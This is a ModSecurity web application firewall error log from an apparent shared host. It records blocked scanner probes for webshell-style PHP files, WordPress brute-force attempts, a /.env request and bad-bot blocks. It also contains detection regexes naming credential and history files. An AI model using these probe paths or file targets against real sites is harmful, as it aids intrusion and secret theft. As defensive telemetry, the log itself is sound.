[Tue May 26 13:01:42.982737 2026] [security2:error] [pid 470766:tid 470958] [client 4.201.75.230:5375] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/gelay.php"] [unique_id "ahVMXujO_W1DqEcFHQ7qlQAAAD4"]
[Tue May 26 13:01:44.117986 2026] [security2:error] [pid 470766:tid 470903] [client 14.181.86.211:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVMX-jO_W1DqEcFHQ7qpwAAAAc"]
[Tue May 26 13:01:44.781418 2026] [security2:error] [pid 470766:tid 470982] [client 138.2.67.134:15918] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "bosscoirs.com"] [uri "/wp-comments-post.php"] [unique_id "ahVMYOjO_W1DqEcFHQ7qwwAAAFY"]
[Tue May 26 13:01:45.533497 2026] [security2:error] [pid 470766:tid 470982] [client 138.2.67.134:15918] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "302"] [hostname "bosscoirs.com"] [uri "/wp-comments-post.php"] [unique_id "ahVMYOjO_W1DqEcFHQ7qwwAAAFY"]
[Tue May 26 13:01:45.533674 2026] [security2:error] [pid 470766:tid 470982] [client 138.2.67.134:15918] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "bosscoirs.com"] [uri "/wp-comments-post.php"] [unique_id "ahVMYOjO_W1DqEcFHQ7qwwAAAFY"]
[Tue May 26 13:01:45.654930 2026] [security2:error] [pid 470766:tid 470934] [client 4.201.75.230:5647] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/god4m.php"] [unique_id "ahVMYejO_W1DqEcFHQ7q1QAAACY"]
[Tue May 26 13:01:46.552994 2026] [security2:error] [pid 470766:tid 471010] [client 157.20.138.61:58808] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVMYujO_W1DqEcFHQ7q5wAAAHI"]
[Tue May 26 13:01:46.553121 2026] [security2:error] [pid 470766:tid 471010] [client 157.20.138.61:58808] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVMYujO_W1DqEcFHQ7q5wAAAHI"]
[Tue May 26 13:01:46.842537 2026] [security2:error] [pid 470766:tid 471001] [client 4.201.75.230:5677] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/mari.php"] [unique_id "ahVMYujO_W1DqEcFHQ7q7gAAAGk"]
[Tue May 26 13:01:47.165400 2026] [security2:error] [pid 470766:tid 470989] [client 57.141.2.27:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVMYujO_W1DqEcFHQ7q7QAAAF0"]
[Tue May 26 13:01:48.318105 2026] [security2:error] [pid 470766:tid 470926] [client 4.201.75.230:5340] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/moon.php"] [unique_id "ahVMZOjO_W1DqEcFHQ7rDAAAAB4"]
[Tue May 26 13:01:48.463706 2026] [security2:error] [pid 470766:tid 470938] [client 100.26.33.102:61479] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 102.33.26.100.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cargo-pulse.info"] [uri "/wp-login.php"] [unique_id "ahVMZOjO_W1DqEcFHQ7rCwAAACo"]
[Tue May 26 13:01:48.463818 2026] [security2:error] [pid 470766:tid 470938] [client 100.26.33.102:61479] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cargo-pulse.info"] [uri "/wp-login.php"] [unique_id "ahVMZOjO_W1DqEcFHQ7rCwAAACo"]
[Tue May 26 13:01:49.970424 2026] [security2:error] [pid 470766:tid 471019] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVMZejO_W1DqEcFHQ7rKgAAAHs"]
[Tue May 26 13:01:50.200267 2026] [security2:error] [pid 470766:tid 470845] [remote 185.230.216.227:44078] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 227.216.230.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "veganfoodindia.com"] [uri "/wp-login.php"] [unique_id "ahVMZejO_W1DqEcFHQ7rMwAAN04"]
[Tue May 26 13:01:52.522310 2026] [security2:error] [pid 470766:tid 470940] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVMaOjO_W1DqEcFHQ7rWQAAACw"]
[Tue May 26 13:01:53.292819 2026] [security2:error] [pid 470766:tid 470937] [client 114.119.138.207:55795] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.anujtradingco.com"] [uri "/top-deejay-headphones/"] [unique_id "ahVMaejO_W1DqEcFHQ7rbQAAACk"], referer: https://jump-to.link/
[Tue May 26 13:01:54.415095 2026] [security2:error] [pid 470766:tid 470929] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVMaejO_W1DqEcFHQ7rhQAAACE"]
[Tue May 26 13:01:54.673921 2026] [security2:error] [pid 470766:tid 470961] [client 208.91.198.85:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.cagmedya.com"] [uri "/index.php"] [unique_id "ahVMaujO_W1DqEcFHQ7rlAAAAEE"]
[Tue May 26 13:01:54.803495 2026] [security2:error] [pid 470766:tid 470897] [client 208.91.198.85:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.cagmedya.com"] [uri "/index.php"] [unique_id "ahVMaujO_W1DqEcFHQ7rlwAAAAE"]
[Tue May 26 13:01:56.366551 2026] [security2:error] [pid 470766:tid 470974] [client 176.65.139.239:24884] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "nicmaperu.com"] [uri "/.env"] [unique_id "ahVMbOjO_W1DqEcFHQ7ruwAAAE4"]
[Tue May 26 13:01:56.459466 2026] [security2:error] [pid 470766:tid 470907] [client 208.91.198.85:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.cagmedya.com"] [uri "/index.php"] [unique_id "ahVMbOjO_W1DqEcFHQ7rugAAAAs"]
[Tue May 26 13:01:56.591401 2026] [security2:error] [pid 470766:tid 470905] [client 208.91.198.85:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.cagmedya.com"] [uri "/index.php"] [unique_id "ahVMbOjO_W1DqEcFHQ7rvgAAAAk"]
[Tue May 26 13:01:56.728818 2026] [security2:error] [pid 470766:tid 471008] [client 208.91.198.85:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.cagmedya.com"] [uri "/index.php"] [unique_id "ahVMbOjO_W1DqEcFHQ7rxAAAAHA"]
[Tue May 26 13:01:57.209276 2026] [security2:error] [pid 470766:tid 471006] [client 157.20.138.61:59162] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVMbejO_W1DqEcFHQ7r1AAAAG4"]
[Tue May 26 13:01:57.209498 2026] [security2:error] [pid 470766:tid 471006] [client 157.20.138.61:59162] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVMbejO_W1DqEcFHQ7r1AAAAG4"]
[Tue May 26 13:01:57.378385 2026] [security2:error] [pid 470766:tid 470958] [client 57.141.2.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVMbOjO_W1DqEcFHQ7rzQAAAD4"]
[Tue May 26 13:01:58.683810 2026] [security2:error] [pid 470766:tid 470915] [client 4.201.75.230:5339] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/o.php"] [unique_id "ahVMbujO_W1DqEcFHQ7r7gAAABM"]
[Tue May 26 13:01:59.653754 2026] [security2:error] [pid 470766:tid 471016] [client 185.191.171.13:42978] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/tag/kids-night-out/day/2026-03-04/"] [unique_id "ahVMb-jO_W1DqEcFHQ7sAAAAAHg"]
[Tue May 26 13:01:59.653889 2026] [security2:error] [pid 470766:tid 471016] [client 185.191.171.13:42978] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/tag/kids-night-out/day/2026-03-04/"] [unique_id "ahVMb-jO_W1DqEcFHQ7sAAAAAHg"]
[Tue May 26 13:01:59.802208 2026] [security2:error] [pid 470766:tid 470855] [remote 42.116.123.127:10351] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 127.123.116.42.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "tea.canopykaapi.com"] [uri "/wp-login.php"] [unique_id "ahVMb-jO_W1DqEcFHQ7r_wAAZ1g"]
[Tue May 26 13:01:59.807847 2026] [security2:error] [pid 470766:tid 470971] [client 57.141.2.56:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVMb-jO_W1DqEcFHQ7r_gAAAEs"]
[Tue May 26 13:02:00.238963 2026] [security2:error] [pid 470766:tid 470952] [client 74.7.228.60:33238] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "bhavisharchitects.com"] [uri "/cgi-sys/404.html"] [unique_id "ahVMcOjO_W1DqEcFHQ7sCwAAOF4"]
[Tue May 26 13:02:00.566730 2026] [security2:error] [pid 470766:tid 470987] [client 4.201.75.230:5693] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/tmp.php"] [unique_id "ahVMcOjO_W1DqEcFHQ7sDwAAAFs"]
[Tue May 26 13:02:01.635552 2026] [security2:error] [pid 470766:tid 470982] [client 4.201.75.230:5664] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/wp-admin/a.php"] [unique_id "ahVMcejO_W1DqEcFHQ7sKQAAAFY"]
[Tue May 26 13:02:01.831452 2026] [security2:error] [pid 470766:tid 470993] [client 57.141.2.51:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVMcejO_W1DqEcFHQ7sHwAAAGE"]
[Tue May 26 13:02:02.914521 2026] [security2:error] [pid 470766:tid 470925] [client 4.201.75.230:5313] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/wp-admin/alfa.php"] [unique_id "ahVMcujO_W1DqEcFHQ7sPQAAAB0"]
[Tue May 26 13:02:04.793994 2026] [security2:error] [pid 470766:tid 470979] [client 57.141.2.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVMdOjO_W1DqEcFHQ7sYQAAAFM"]
[Tue May 26 13:02:04.833285 2026] [security2:error] [pid 470766:tid 470876] [remote 165.22.214.22:39352] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 22.214.22.165.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "canopykaapi.com"] [uri "/wp-login.php"] [unique_id "ahVMdOjO_W1DqEcFHQ7saAAAUm0"]
[Tue May 26 13:02:07.331583 2026] [security2:error] [pid 470766:tid 471017] [client 57.141.2.64:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVMdujO_W1DqEcFHQ7soAAAAHk"]
[Tue May 26 13:02:07.691106 2026] [security2:error] [pid 470766:tid 470941] [client 157.20.138.61:59526] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVMd-jO_W1DqEcFHQ7srwAAAC0"]
[Tue May 26 13:02:07.691238 2026] [security2:error] [pid 470766:tid 470941] [client 157.20.138.61:59526] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVMd-jO_W1DqEcFHQ7srwAAAC0"]
[Tue May 26 13:02:08.050667 2026] [security2:error] [pid 470766:tid 470893] [remote 103.91.67.202:58246] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 202.67.91.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "atreegroup.com"] [uri "/wp-login.php"] [unique_id "ahVMd-jO_W1DqEcFHQ7stgAADX4"]
[Tue May 26 13:02:11.039516 2026] [security2:error] [pid 470766:tid 470780] [remote 57.141.2.23:62826] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 23.2.141.57.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "eco-green.com.mx"] [uri "/w2.php"] [unique_id "ahVMeujO_W1DqEcFHQ7s-QAADQ0"]
[Tue May 26 13:02:12.063838 2026] [security2:error] [pid 470766:tid 470986] [client 167.62.220.188:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVMe-jO_W1DqEcFHQ7tDQAAAFo"]
[Tue May 26 13:02:12.147467 2026] [security2:error] [pid 470766:tid 470799] [remote 74.7.241.58:37080] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahVMfOjO_W1DqEcFHQ7tHgAAaCA"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/www/shop/wp-content/plugins/yith-woocommerce-wishlist/plugin-fw/includes
[Tue May 26 13:02:12.227730 2026] [security2:error] [pid 470766:tid 470930] [client 57.141.2.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVMe-jO_W1DqEcFHQ7tFgAAACI"]
[Tue May 26 13:02:13.168415 2026] [security2:error] [pid 470766:tid 470985] [client 104.43.242.179:45043] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 179.242.43.104.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "singhcouriercargo.com"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahVMfejO_W1DqEcFHQ7tQAAAAFk"]
[Tue May 26 13:02:13.168576 2026] [security2:error] [pid 470766:tid 470985] [client 104.43.242.179:45043] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "singhcouriercargo.com"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahVMfejO_W1DqEcFHQ7tQAAAAFk"]
[Tue May 26 13:02:13.783878 2026] [security2:error] [pid 470766:tid 470945] [client 4.201.75.230:5650] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/wp-admin/network/index.php"] [unique_id "ahVMfejO_W1DqEcFHQ7tTgAAADE"]
[Tue May 26 13:02:14.647397 2026] [security2:error] [pid 470766:tid 470950] [client 104.43.242.179:44949] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 179.242.43.104.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "singhcouriercargo.com"] [uri "/x.php"] [unique_id "ahVMfujO_W1DqEcFHQ7tZwAAADY"]
[Tue May 26 13:02:14.647515 2026] [security2:error] [pid 470766:tid 470950] [client 104.43.242.179:44949] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "singhcouriercargo.com"] [uri "/x.php"] [unique_id "ahVMfujO_W1DqEcFHQ7tZwAAADY"]
[Tue May 26 13:02:16.389037 2026] [security2:error] [pid 470766:tid 470974] [client 104.43.242.179:45044] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 179.242.43.104.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "singhcouriercargo.com"] [uri "/wpconf.php"] [unique_id "ahVMgOjO_W1DqEcFHQ7tigAAAE4"]
[Tue May 26 13:02:16.389148 2026] [security2:error] [pid 470766:tid 470974] [client 104.43.242.179:45044] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "singhcouriercargo.com"] [uri "/wpconf.php"] [unique_id "ahVMgOjO_W1DqEcFHQ7tigAAAE4"]
[Tue May 26 13:02:16.899875 2026] [security2:error] [pid 470766:tid 471016] [client 57.141.2.47:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVMgOjO_W1DqEcFHQ7tjwAAAHg"]
[Tue May 26 13:02:17.887345 2026] [security2:error] [pid 470766:tid 470971] [client 104.43.242.179:44994] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 179.242.43.104.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "singhcouriercargo.com"] [uri "/aaf.php"] [unique_id "ahVMgejO_W1DqEcFHQ7tsgAAAEs"]
[Tue May 26 13:02:17.887505 2026] [security2:error] [pid 470766:tid 470971] [client 104.43.242.179:44994] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "singhcouriercargo.com"] [uri "/aaf.php"] [unique_id "ahVMgejO_W1DqEcFHQ7tsgAAAEs"]
[Tue May 26 13:02:18.264339 2026] [security2:error] [pid 470766:tid 470910] [client 157.20.138.61:59883] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVMgujO_W1DqEcFHQ7tuQAAAA4"]
[Tue May 26 13:02:18.264493 2026] [security2:error] [pid 470766:tid 470910] [client 157.20.138.61:59883] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVMgujO_W1DqEcFHQ7tuQAAAA4"]
[Tue May 26 13:02:18.724146 2026] [security2:error] [pid 470766:tid 470954] [client 57.141.2.61:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVMgujO_W1DqEcFHQ7tvAAAADo"]
[Tue May 26 13:02:19.772893 2026] [security2:error] [pid 470766:tid 470950] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVMg-jO_W1DqEcFHQ7t1QAAADY"]
[Tue May 26 13:02:20.262800 2026] [security2:error] [pid 470766:tid 470906] [client 223.109.255.206:53181] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVMhOjO_W1DqEcFHQ7t5gAAAAo"], referer: http://pic.sogou.com
